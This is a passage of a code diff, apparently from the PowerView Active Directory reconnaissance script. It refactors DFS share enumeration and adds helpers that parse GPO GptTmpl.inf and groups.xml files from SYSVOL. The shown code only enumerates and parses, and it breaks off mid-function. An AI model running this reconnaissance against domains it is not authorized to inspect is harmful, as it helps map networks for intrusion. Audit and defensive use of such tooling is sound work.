all distributed file system shares for the current domain. + +.EXAMPLE + +Get-DomainDFSShare -Domain testlab.local + +Returns all distributed file system shares for the 'testlab.local' domain. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainDFSShare -Credential $Cred + +.OUTPUTS + +System.Management.Automation.PSCustomObject + +A custom PSObject describing the distributed file systems. #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseApprovedVerbs', '')] + [OutputType('System.Management.Automation.PSCustomObject')] [CmdletBinding()] - param( - [String] - [ValidateSet("All","V1","1","V2","2")] - $Version = "All", + Param( + [Parameter( ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [ValidateNotNullOrEmpty()] + [Alias('DomainName', 'Name')] + [String[]] + $Domain, + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] [String] - $Domain, + $SearchBase, + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] [String] - $DomainController, + $Server, + [ValidateSet('Base', 'OneLevel', 'Subtree')] [String] - $ADSpath, + $SearchScope = 'Subtree', - [ValidateRange(1,10000)] + [ValidateRange(1, 10000)] [Int] - $PageSize = 200, + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, [Management.Automation.PSCredential] - $Credential + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [ValidateSet('All', 'V1', '1', 'V2', '2')] + [String] + $Version = 'All' ) - function Parse-Pkt { - [CmdletBinding()] - param( - [byte[]] - $Pkt - ) - - $bin = $Pkt - $blob_version = [bitconverter]::ToUInt32($bin[0..3],0) - $blob_element_count = [bitconverter]::ToUInt32($bin[4..7],0) - $offset = 8 - #https://msdn.microsoft.com/en-us/library/cc227147.aspx - $object_list = @() - for($i=1; $i -le $blob_element_count; $i++){ - $blob_name_size_start = $offset - $blob_name_size_end = $offset + 1 - $blob_name_size = [bitconverter]::ToUInt16($bin[$blob_name_size_start..$blob_name_size_end],0) - - $blob_name_start = $blob_name_size_end + 1 - $blob_name_end = $blob_name_start + $blob_name_size - 1 - $blob_name = [System.Text.Encoding]::Unicode.GetString($bin[$blob_name_start..$blob_name_end]) - - $blob_data_size_start = $blob_name_end + 1 - $blob_data_size_end = $blob_data_size_start + 3 - $blob_data_size = [bitconverter]::ToUInt32($bin[$blob_data_size_start..$blob_data_size_end],0) - - $blob_data_start = $blob_data_size_end + 1 - $blob_data_end = $blob_data_start + $blob_data_size - 1 - $blob_data = $bin[$blob_data_start..$blob_data_end] - switch -wildcard ($blob_name) { - "\siteroot" { } - "\domainroot*" { - # Parse DFSNamespaceRootOrLinkBlob object. Starts with variable length DFSRootOrLinkIDBlob which we parse first... - # DFSRootOrLinkIDBlob - $root_or_link_guid_start = 0 - $root_or_link_guid_end = 15 - $root_or_link_guid = [byte[]]$blob_data[$root_or_link_guid_start..$root_or_link_guid_end] - $guid = New-Object Guid(,$root_or_link_guid) # should match $guid_str - $prefix_size_start = $root_or_link_guid_end + 1 - $prefix_size_end = $prefix_size_start + 1 - $prefix_size = [bitconverter]::ToUInt16($blob_data[$prefix_size_start..$prefix_size_end],0) - $prefix_start = $prefix_size_end + 1 - $prefix_end = $prefix_start + $prefix_size - 1 - $prefix = [System.Text.Encoding]::Unicode.GetString($blob_data[$prefix_start..$prefix_end]) - - $short_prefix_size_start = $prefix_end + 1 - $short_prefix_size_end = $short_prefix_size_start + 1 - $short_prefix_size = [bitconverter]::ToUInt16($blob_data[$short_prefix_size_start..$short_prefix_size_end],0) - $short_prefix_start = $short_prefix_size_end + 1 - $short_prefix_end = $short_prefix_start + $short_prefix_size - 1 - $short_prefix = [System.Text.Encoding]::Unicode.GetString($blob_data[$short_prefix_start..$short_prefix_end]) - - $type_start = $short_prefix_end + 1 - $type_end = $type_start + 3 - $type = [bitconverter]::ToUInt32($blob_data[$type_start..$type_end],0) - - $state_start = $type_end + 1 - $state_end = $state_start + 3 - $state = [bitconverter]::ToUInt32($blob_data[$state_start..$state_end],0) - - $comment_size_start = $state_end + 1 - $comment_size_end = $comment_size_start + 1 - $comment_size = [bitconverter]::ToUInt16($blob_data[$comment_size_start..$comment_size_end],0) - $comment_start = $comment_size_end + 1 - $comment_end = $comment_start + $comment_size - 1 - if ($comment_size -gt 0) { - $comment = [System.Text.Encoding]::Unicode.GetString($blob_data[$comment_start..$comment_end]) - } - $prefix_timestamp_start = $comment_end + 1 - $prefix_timestamp_end = $prefix_timestamp_start + 7 - # https://msdn.microsoft.com/en-us/library/cc230324.aspx FILETIME - $prefix_timestamp = $blob_data[$prefix_timestamp_start..$prefix_timestamp_end] #dword lowDateTime #dword highdatetime - $state_timestamp_start = $prefix_timestamp_end + 1 - $state_timestamp_end = $state_timestamp_start + 7 - $state_timestamp = $blob_data[$state_timestamp_start..$state_timestamp_end] - $comment_timestamp_start = $state_timestamp_end + 1 - $comment_timestamp_end = $comment_timestamp_start + 7 - $comment_timestamp = $blob_data[$comment_timestamp_start..$comment_timestamp_end] - $version_start = $comment_timestamp_end + 1 - $version_end = $version_start + 3 - $version = [bitconverter]::ToUInt32($blob_data[$version_start..$version_end],0) - - # Parse rest of DFSNamespaceRootOrLinkBlob here - $dfs_targetlist_blob_size_start = $version_end + 1 - $dfs_targetlist_blob_size_end = $dfs_targetlist_blob_size_start + 3 - $dfs_targetlist_blob_size = [bitconverter]::ToUInt32($blob_data[$dfs_targetlist_blob_size_start..$dfs_targetlist_blob_size_end],0) - - $dfs_targetlist_blob_start = $dfs_targetlist_blob_size_end + 1 - $dfs_targetlist_blob_end = $dfs_targetlist_blob_start + $dfs_targetlist_blob_size - 1 - $dfs_targetlist_blob = $blob_data[$dfs_targetlist_blob_start..$dfs_targetlist_blob_end] - $reserved_blob_size_start = $dfs_targetlist_blob_end + 1 - $reserved_blob_size_end = $reserved_blob_size_start + 3 - $reserved_blob_size = [bitconverter]::ToUInt32($blob_data[$reserved_blob_size_start..$reserved_blob_size_end],0) - - $reserved_blob_start = $reserved_blob_size_end + 1 - $reserved_blob_end = $reserved_blob_start + $reserved_blob_size - 1 - $reserved_blob = $blob_data[$reserved_blob_start..$reserved_blob_end] - $referral_ttl_start = $reserved_blob_end + 1 - $referral_ttl_end = $referral_ttl_start + 3 - $referral_ttl = [bitconverter]::ToUInt32($blob_data[$referral_ttl_start..$referral_ttl_end],0) - - #Parse DFSTargetListBlob - $target_count_start = 0 - $target_count_end = $target_count_start + 3 - $target_count = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_count_start..$target_count_end],0) - $t_offset = $target_count_end + 1 - - for($j=1; $j -le $target_count; $j++){ - $target_entry_size_start = $t_offset - $target_entry_size_end = $target_entry_size_start + 3 - $target_entry_size = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_entry_size_start..$target_entry_size_end],0) - $target_time_stamp_start = $target_entry_size_end + 1 - $target_time_stamp_end = $target_time_stamp_start + 7 - # FILETIME again or special if priority rank and priority class 0 - $target_time_stamp = $dfs_targetlist_blob[$target_time_stamp_start..$target_time_stamp_end] - $target_state_start = $target_time_stamp_end + 1 - $target_state_end = $target_state_start + 3 - $target_state = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_state_start..$target_state_end],0) - - $target_type_start = $target_state_end + 1 - $target_type_end = $target_type_start + 3 - $target_type = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_type_start..$target_type_end],0) - - $server_name_size_start = $target_type_end + 1 - $server_name_size_end = $server_name_size_start + 1 - $server_name_size = [bitconverter]::ToUInt16($dfs_targetlist_blob[$server_name_size_start..$server_name_size_end],0) - - $server_name_start = $server_name_size_end + 1 - $server_name_end = $server_name_start + $server_name_size - 1 - $server_name = [System.Text.Encoding]::Unicode.GetString($dfs_targetlist_blob[$server_name_start..$server_name_end]) - - $share_name_size_start = $server_name_end + 1 - $share_name_size_end = $share_name_size_start + 1 - $share_name_size = [bitconverter]::ToUInt16($dfs_targetlist_blob[$share_name_size_start..$share_name_size_end],0) - $share_name_start = $share_name_size_end + 1 - $share_name_end = $share_name_start + $share_name_size - 1 - $share_name = [System.Text.Encoding]::Unicode.GetString($dfs_targetlist_blob[$share_name_start..$share_name_end]) - - $target_list += "\\$server_name\$share_name" - $t_offset = $share_name_end + 1 - } - } - } - $offset = $blob_data_end + 1 - $dfs_pkt_properties = @{ - 'Name' = $blob_name - 'Prefix' = $prefix - 'TargetList' = $target_list - } - $object_list += New-Object -TypeName PSObject -Property $dfs_pkt_properties - $prefix = $null - $blob_name = $null - $target_list = $null - } - - $servers = @() - $object_list | ForEach-Object { - if ($_.TargetList) { - $_.TargetList | ForEach-Object { - $servers += $_.split("\")[2] - } - } - } - - $servers - } - - function Get-DFSshareV1 { - [CmdletBinding()] - param( - [String] - $Domain, - - [String] - $DomainController, + BEGIN { + $SearcherArguments = @{} + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + + function Parse-Pkt { + [CmdletBinding()] + Param( + [Byte[]] + $Pkt + ) + + $bin = $Pkt + $blob_version = [bitconverter]::ToUInt32($bin[0..3],0) + $blob_element_count = [bitconverter]::ToUInt32($bin[4..7],0) + $offset = 8 + #https://msdn.microsoft.com/en-us/library/cc227147.aspx + $object_list = @() + for($i=1; $i -le $blob_element_count; $i++){ + $blob_name_size_start = $offset + $blob_name_size_end = $offset + 1 + $blob_name_size = [bitconverter]::ToUInt16($bin[$blob_name_size_start..$blob_name_size_end],0) + + $blob_name_start = $blob_name_size_end + 1 + $blob_name_end = $blob_name_start + $blob_name_size - 1 + $blob_name = [System.Text.Encoding]::Unicode.GetString($bin[$blob_name_start..$blob_name_end]) + + $blob_data_size_start = $blob_name_end + 1 + $blob_data_size_end = $blob_data_size_start + 3 + $blob_data_size = [bitconverter]::ToUInt32($bin[$blob_data_size_start..$blob_data_size_end],0) + + $blob_data_start = $blob_data_size_end + 1 + $blob_data_end = $blob_data_start + $blob_data_size - 1 + $blob_data = $bin[$blob_data_start..$blob_data_end] + switch -wildcard ($blob_name) { + "\siteroot" { } + "\domainroot*" { + # Parse DFSNamespaceRootOrLinkBlob object. Starts with variable length DFSRootOrLinkIDBlob which we parse first... + # DFSRootOrLinkIDBlob + $root_or_link_guid_start = 0 + $root_or_link_guid_end = 15 + $root_or_link_guid = [byte[]]$blob_data[$root_or_link_guid_start..$root_or_link_guid_end] + $guid = New-Object Guid(,$root_or_link_guid) # should match $guid_str + $prefix_size_start = $root_or_link_guid_end + 1 + $prefix_size_end = $prefix_size_start + 1 + $prefix_size = [bitconverter]::ToUInt16($blob_data[$prefix_size_start..$prefix_size_end],0) + $prefix_start = $prefix_size_end + 1 + $prefix_end = $prefix_start + $prefix_size - 1 + $prefix = [System.Text.Encoding]::Unicode.GetString($blob_data[$prefix_start..$prefix_end]) + + $short_prefix_size_start = $prefix_end + 1 + $short_prefix_size_end = $short_prefix_size_start + 1 + $short_prefix_size = [bitconverter]::ToUInt16($blob_data[$short_prefix_size_start..$short_prefix_size_end],0) + $short_prefix_start = $short_prefix_size_end + 1 + $short_prefix_end = $short_prefix_start + $short_prefix_size - 1 + $short_prefix = [System.Text.Encoding]::Unicode.GetString($blob_data[$short_prefix_start..$short_prefix_end]) + + $type_start = $short_prefix_end + 1 + $type_end = $type_start + 3 + $type = [bitconverter]::ToUInt32($blob_data[$type_start..$type_end],0) + + $state_start = $type_end + 1 + $state_end = $state_start + 3 + $state = [bitconverter]::ToUInt32($blob_data[$state_start..$state_end],0) + + $comment_size_start = $state_end + 1 + $comment_size_end = $comment_size_start + 1 + $comment_size = [bitconverter]::ToUInt16($blob_data[$comment_size_start..$comment_size_end],0) + $comment_start = $comment_size_end + 1 + $comment_end = $comment_start + $comment_size - 1 + if ($comment_size -gt 0) { + $comment = [System.Text.Encoding]::Unicode.GetString($blob_data[$comment_start..$comment_end]) + } + $prefix_timestamp_start = $comment_end + 1 + $prefix_timestamp_end = $prefix_timestamp_start + 7 + # https://msdn.microsoft.com/en-us/library/cc230324.aspx FILETIME + $prefix_timestamp = $blob_data[$prefix_timestamp_start..$prefix_timestamp_end] #dword lowDateTime #dword highdatetime + $state_timestamp_start = $prefix_timestamp_end + 1 + $state_timestamp_end = $state_timestamp_start + 7 + $state_timestamp = $blob_data[$state_timestamp_start..$state_timestamp_end] + $comment_timestamp_start = $state_timestamp_end + 1 + $comment_timestamp_end = $comment_timestamp_start + 7 + $comment_timestamp = $blob_data[$comment_timestamp_start..$comment_timestamp_end] + $version_start = $comment_timestamp_end + 1 + $version_end = $version_start + 3 + $version = [bitconverter]::ToUInt32($blob_data[$version_start..$version_end],0) + + # Parse rest of DFSNamespaceRootOrLinkBlob here + $dfs_targetlist_blob_size_start = $version_end + 1 + $dfs_targetlist_blob_size_end = $dfs_targetlist_blob_size_start + 3 + $dfs_targetlist_blob_size = [bitconverter]::ToUInt32($blob_data[$dfs_targetlist_blob_size_start..$dfs_targetlist_blob_size_end],0) + + $dfs_targetlist_blob_start = $dfs_targetlist_blob_size_end + 1 + $dfs_targetlist_blob_end = $dfs_targetlist_blob_start + $dfs_targetlist_blob_size - 1 + $dfs_targetlist_blob = $blob_data[$dfs_targetlist_blob_start..$dfs_targetlist_blob_end] + $reserved_blob_size_start = $dfs_targetlist_blob_end + 1 + $reserved_blob_size_end = $reserved_blob_size_start + 3 + $reserved_blob_size = [bitconverter]::ToUInt32($blob_data[$reserved_blob_size_start..$reserved_blob_size_end],0) + + $reserved_blob_start = $reserved_blob_size_end + 1 + $reserved_blob_end = $reserved_blob_start + $reserved_blob_size - 1 + $reserved_blob = $blob_data[$reserved_blob_start..$reserved_blob_end] + $referral_ttl_start = $reserved_blob_end + 1 + $referral_ttl_end = $referral_ttl_start + 3 + $referral_ttl = [bitconverter]::ToUInt32($blob_data[$referral_ttl_start..$referral_ttl_end],0) + + #Parse DFSTargetListBlob + $target_count_start = 0 + $target_count_end = $target_count_start + 3 + $target_count = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_count_start..$target_count_end],0) + $t_offset = $target_count_end + 1 + + for($j=1; $j -le $target_count; $j++){ + $target_entry_size_start = $t_offset + $target_entry_size_end = $target_entry_size_start + 3 + $target_entry_size = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_entry_size_start..$target_entry_size_end],0) + $target_time_stamp_start = $target_entry_size_end + 1 + $target_time_stamp_end = $target_time_stamp_start + 7 + # FILETIME again or special if priority rank and priority class 0 + $target_time_stamp = $dfs_targetlist_blob[$target_time_stamp_start..$target_time_stamp_end] + $target_state_start = $target_time_stamp_end + 1 + $target_state_end = $target_state_start + 3 + $target_state = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_state_start..$target_state_end],0) + + $target_type_start = $target_state_end + 1 + $target_type_end = $target_type_start + 3 + $target_type = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_type_start..$target_type_end],0) + + $server_name_size_start = $target_type_end + 1 + $server_name_size_end = $server_name_size_start + 1 + $server_name_size = [bitconverter]::ToUInt16($dfs_targetlist_blob[$server_name_size_start..$server_name_size_end],0) + + $server_name_start = $server_name_size_end + 1 + $server_name_end = $server_name_start + $server_name_size - 1 + $server_name = [System.Text.Encoding]::Unicode.GetString($dfs_targetlist_blob[$server_name_start..$server_name_end]) + + $share_name_size_start = $server_name_end + 1 + $share_name_size_end = $share_name_size_start + 1 + $share_name_size = [bitconverter]::ToUInt16($dfs_targetlist_blob[$share_name_size_start..$share_name_size_end],0) + $share_name_start = $share_name_size_end + 1 + $share_name_end = $share_name_start + $share_name_size - 1 + $share_name = [System.Text.Encoding]::Unicode.GetString($dfs_targetlist_blob[$share_name_start..$share_name_end]) + + $target_list += "\\$server_name\$share_name" + $t_offset = $share_name_end + 1 + } + } + } + $offset = $blob_data_end + 1 + $dfs_pkt_properties = @{ + 'Name' = $blob_name + 'Prefix' = $prefix + 'TargetList' = $target_list + } + $object_list += New-Object -TypeName PSObject -Property $dfs_pkt_properties + $prefix = $Null + $blob_name = $Null + $target_list = $Null + } + + $servers = @() + $object_list | ForEach-Object { + if ($_.TargetList) { + $_.TargetList | ForEach-Object { + $servers += $_.split('\')[2] + } + } + } - [String] - $ADSpath, + $servers + } - [ValidateRange(1,10000)] - [Int] - $PageSize = 200, + function Get-DomainDFSShareV1 { + [CmdletBinding()] + Param( + [String] + $Domain, - [Management.Automation.PSCredential] - $Credential - ) + [String] + $SearchBase, - $DFSsearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize + [String] + $Server, - if($DFSsearcher) { - $DFSshares = @() - $DFSsearcher.filter = "(&(objectClass=fTDfs))" + [String] + $SearchScope = 'Subtree', - try { - $Results = $DFSSearcher.FindAll() - $Results | Where-Object {$_} | ForEach-Object { - $Properties = $_.Properties - $RemoteNames = $Properties.remoteservername - $Pkt = $Properties.pkt + [Int] + $ResultPageSize = 200, - $DFSshares += $RemoteNames | ForEach-Object { - try { - if ( $_.Contains('\') ) { - New-Object -TypeName PSObject -Property @{'Name'=$Properties.name[0];'RemoteServerName'=$_.split("\")[2]} + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + $DFSsearcher = Get-DomainSearcher @PSBoundParameters + + if ($DFSsearcher) { + $DFSshares = @() + $DFSsearcher.filter = '(&(objectClass=fTDfs))' + + try { + $Results = $DFSSearcher.FindAll() + $Results | Where-Object {$_} | ForEach-Object { + $Properties = $_.Properties + $RemoteNames = $Properties.remoteservername + $Pkt = $Properties.pkt + + $DFSshares += $RemoteNames | ForEach-Object { + try { + if ( $_.Contains('\') ) { + New-Object -TypeName PSObject -Property @{'Name'=$Properties.name[0];'RemoteServerName'=$_.split('\')[2]} + } + } + catch { + Write-Verbose "[Get-DomainDFSShare] Get-DomainDFSShareV1 error in parsing DFS share : $_" } } + } + if ($Results) { + try { $Results.dispose() } catch { - Write-Verbose "Error in parsing DFS share : $_" + Write-Verbose "[Get-DomainDFSShare] Get-DomainDFSShareV1 error disposing of the Results object: $_" + } + } + $DFSSearcher.dispose() + + if ($pkt -and $pkt[0]) { + Parse-Pkt $pkt[0] | ForEach-Object { + # If a folder doesn't have a redirection it will have a target like + # \\null\TestNameSpace\folder\.DFSFolderLink so we do actually want to match + # on 'null' rather than $Null + if ($_ -ne 'null') { + New-Object -TypeName PSObject -Property @{'Name'=$Properties.name[0];'RemoteServerName'=$_} + } } } } - $Results.dispose() - $DFSSearcher.dispose() + catch { + Write-Warning "[Get-DomainDFSShare] Get-DomainDFSShareV1 error : $_" + } + $DFSshares | Sort-Object -Unique -Property 'RemoteServerName' + } + } + + function Get-DomainDFSShareV2 { + [CmdletBinding()] + Param( + [String] + $Domain, + + [String] + $SearchBase, + + [String] + $Server, + + [String] + $SearchScope = 'Subtree', + + [Int] + $ResultPageSize = 200, + + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + $DFSsearcher = Get-DomainSearcher @PSBoundParameters - if($pkt -and $pkt[0]) { - Parse-Pkt $pkt[0] | ForEach-Object { - # If a folder doesn't have a redirection it will - # have a target like - # \\null\TestNameSpace\folder\.DFSFolderLink so we - # do actually want to match on "null" rather than - # $null - if ($_ -ne "null") { - New-Object -TypeName PSObject -Property @{'Name'=$Properties.name[0];'RemoteServerName'=$_} + if ($DFSsearcher) { + $DFSshares = @() + $DFSsearcher.filter = '(&(objectClass=msDFS-Linkv2))' + $Null = $DFSSearcher.PropertiesToLoad.AddRange(('msdfs-linkpathv2','msDFS-TargetListv2')) + + try { + $Results = $DFSSearcher.FindAll() + $Results | Where-Object {$_} | ForEach-Object { + $Properties = $_.Properties + $target_list = $Properties.'msdfs-targetlistv2'[0] + $xml = [xml][System.Text.Encoding]::Unicode.GetString($target_list[2..($target_list.Length-1)]) + $DFSshares += $xml.targets.ChildNodes | ForEach-Object { + try { + $Target = $_.InnerText + if ( $Target.Contains('\') ) { + $DFSroot = $Target.split('\')[3] + $ShareName = $Properties.'msdfs-linkpathv2'[0] + New-Object -TypeName PSObject -Property @{'Name'="$DFSroot$ShareName";'RemoteServerName'=$Target.split('\')[2]} + } + } + catch { + Write-Verbose "[Get-DomainDFSShare] Get-DomainDFSShareV2 error in parsing target : $_" + } + } + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainDFSShare] Error disposing of the Results object: $_" } } + $DFSSearcher.dispose() + } + catch { + Write-Warning "[Get-DomainDFSShare] Get-DomainDFSShareV2 error : $_" } + $DFSshares | Sort-Object -Unique -Property 'RemoteServerName' } - catch { - Write-Warning "Get-DFSshareV1 error : $_" + } + } + + PROCESS { + $DFSshares = @() + + if ($PSBoundParameters['Domain']) { + ForEach ($TargetDomain in $Domain) { + $SearcherArguments['Domain'] = $TargetDomain + if ($Version -match 'all|1') { + $DFSshares += Get-DomainDFSShareV1 @SearcherArguments + } + if ($Version -match 'all|2') { + $DFSshares += Get-DomainDFSShareV2 @SearcherArguments + } + } + } + else { + if ($Version -match 'all|1') { + $DFSshares += Get-DomainDFSShareV1 @SearcherArguments + } + if ($Version -match 'all|2') { + $DFSshares += Get-DomainDFSShareV2 @SearcherArguments } - $DFSshares | Sort-Object -Property "RemoteServerName" } + + $DFSshares | Sort-Object -Property ('RemoteServerName','Name') -Unique } +} + + +######################################################## +# +# GPO related functions. +# +######################################################## - function Get-DFSshareV2 { - [CmdletBinding()] - param( - [String] - $Domain, +function Get-GptTmpl { +<# +.SYNOPSIS - [String] - $DomainController, +Helper to parse a GptTmpl.inf policy file path into a hashtable. - [String] - $ADSpath, +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection, Get-IniContent - [ValidateRange(1,10000)] - [Int] - $PageSize = 200, +.DESCRIPTION - [Management.Automation.PSCredential] - $Credential - ) +Parses a GptTmpl.inf into a custom hashtable using Get-IniContent. If a +GPO object is passed, GPOPATH\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf +is constructed and assumed to be the parse target. If -Credential is passed, +Add-RemoteConnection is used to mount \\TARGET\SYSVOL with the specified creds, +the files are parsed, and the connection is destroyed later with Remove-RemoteConnection. - $DFSsearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize +.PARAMETER GptTmplPath - if($DFSsearcher) { - $DFSshares = @() - $DFSsearcher.filter = "(&(objectClass=msDFS-Linkv2))" - $DFSSearcher.PropertiesToLoad.AddRange(('msdfs-linkpathv2','msDFS-TargetListv2')) +Specifies the GptTmpl.inf file path name to parse. - try { - $Results = $DFSSearcher.FindAll() - $Results | Where-Object {$_} | ForEach-Object { - $Properties = $_.Properties - $target_list = $Properties.'msdfs-targetlistv2'[0] - $xml = [xml][System.Text.Encoding]::Unicode.GetString($target_list[2..($target_list.Length-1)]) - $DFSshares += $xml.targets.ChildNodes | ForEach-Object { - try { - $Target = $_.InnerText - if ( $Target.Contains('\') ) { - $DFSroot = $Target.split("\")[3] - $ShareName = $Properties.'msdfs-linkpathv2'[0] - New-Object -TypeName PSObject -Property @{'Name'="$DFSroot$ShareName";'RemoteServerName'=$Target.split("\")[2]} - } +.PARAMETER OutputObject + +Switch. Output a custom PSObject instead of a hashtable. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system. + +.EXAMPLE + +Get-GptTmpl -GptTmplPath "\\dev.testlab.local\sysvol\dev.testlab.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf" + +Parse the default domain policy .inf for dev.testlab.local + +.EXAMPLE + +Get-DomainGPO testing | Get-GptTmpl + +Parse the GptTmpl.inf policy for the GPO with display name of 'testing'. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-GptTmpl -Credential $Cred -GptTmplPath "\\dev.testlab.local\sysvol\dev.testlab.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf" + +Parse the default domain policy .inf for dev.testlab.local using alternate credentials. + +.OUTPUTS + +Hashtable + +Ouputs a hashtable representing the parsed GptTmpl.inf file. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType([Hashtable])] + [CmdletBinding()] + Param ( + [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('gpcfilesyspath', 'Path')] + [String] + $GptTmplPath, + + [Switch] + $OutputObject, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $MappedPaths = @{} + } + + PROCESS { + try { + if (($GptTmplPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) { + $SysVolPath = "\\$((New-Object System.Uri($GptTmplPath)).Host)\SYSVOL" + if (-not $MappedPaths[$SysVolPath]) { + # map IPC$ to this computer if it's not already + Add-RemoteConnection -Path $SysVolPath -Credential $Credential + $MappedPaths[$SysVolPath] = $True + } + } + + $TargetGptTmplPath = $GptTmplPath + if (-not $TargetGptTmplPath.EndsWith('.inf')) { + $TargetGptTmplPath += '\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf' + } + + Write-Verbose "[Get-GptTmpl] Parsing GptTmplPath: $TargetGptTmplPath" + + if ($PSBoundParameters['OutputObject']) { + $Contents = Get-IniContent -Path $TargetGptTmplPath -OutputObject -ErrorAction Stop + if ($Contents) { + $Contents | Add-Member Noteproperty 'Path' $TargetGptTmplPath + $Contents + } + } + else { + $Contents = Get-IniContent -Path $TargetGptTmplPath -ErrorAction Stop + if ($Contents) { + $Contents['Path'] = $TargetGptTmplPath + $Contents + } + } + } + catch { + Write-Verbose "[Get-GptTmpl] Error parsing $TargetGptTmplPath : $_" + } + } + + END { + # remove the SYSVOL mappings + $MappedPaths.Keys | ForEach-Object { Remove-RemoteConnection -Path $_ } + } +} + + +function Get-GroupsXML { +<# +.SYNOPSIS + +Helper to parse a groups.xml file path into a custom object. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection, ConvertTo-SID + +.DESCRIPTION + +Parses a groups.xml into a custom object. If -Credential is passed, +Add-RemoteConnection is used to mount \\TARGET\SYSVOL with the specified creds, +the files are parsed, and the connection is destroyed later with Remove-RemoteConnection. + +.PARAMETER GroupsXMLpath + +Specifies the groups.xml file path name to parse. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system. + +.OUTPUTS + +PowerView.GroupsXML +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.GroupsXML')] + [CmdletBinding()] + Param ( + [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Path')] + [String] + $GroupsXMLPath, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $MappedPaths = @{} + } + + PROCESS { + try { + if (($GroupsXMLPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) { + $SysVolPath = "\\$((New-Object System.Uri($GroupsXMLPath)).Host)\SYSVOL" + if (-not $MappedPaths[$SysVolPath]) { + # map IPC$ to this computer if it's not already + Add-RemoteConnection -Path $SysVolPath -Credential $Credential + $MappedPaths[$SysVolPath] = $True + } + } + + [XML]$GroupsXMLcontent = Get-Content -Path $GroupsXMLPath -ErrorAction Stop + + # process all group properties in the XML + $GroupsXMLcontent | Select-Xml "/Groups/Group" | Select-Object -ExpandProperty node | ForEach-Object { + + $Groupname = $_.Properties.groupName + + # extract the localgroup sid for memberof + $GroupSID = $_.Properties.groupSid + if (-not $GroupSID) { + if ($Groupname -match 'Administrators') { + $GroupSID = 'S-1-5-32-544' + } + elseif ($Groupname -match 'Remote Desktop') { + $GroupSID = 'S-1-5-32-555' + } + elseif ($Groupname -match 'Guests') { + $GroupSID = 'S-1-5-32-546' + } + else { + if ($PSBoundParameters['Credential']) { + $GroupSID = ConvertTo-SID -ObjectName $Groupname -Credential $Credential + } + else { + $GroupSID = ConvertTo-SID -ObjectName $Groupname } - catch { - Write-Verbose "Error in parsing target : $_" + } + } + + # extract out members added to this group + $Members = $_.Properties.members | Select-Object -ExpandProperty Member | Where-Object { $_.action -match 'ADD' } | ForEach-Object { + if ($_.sid) { $_.sid } + else { 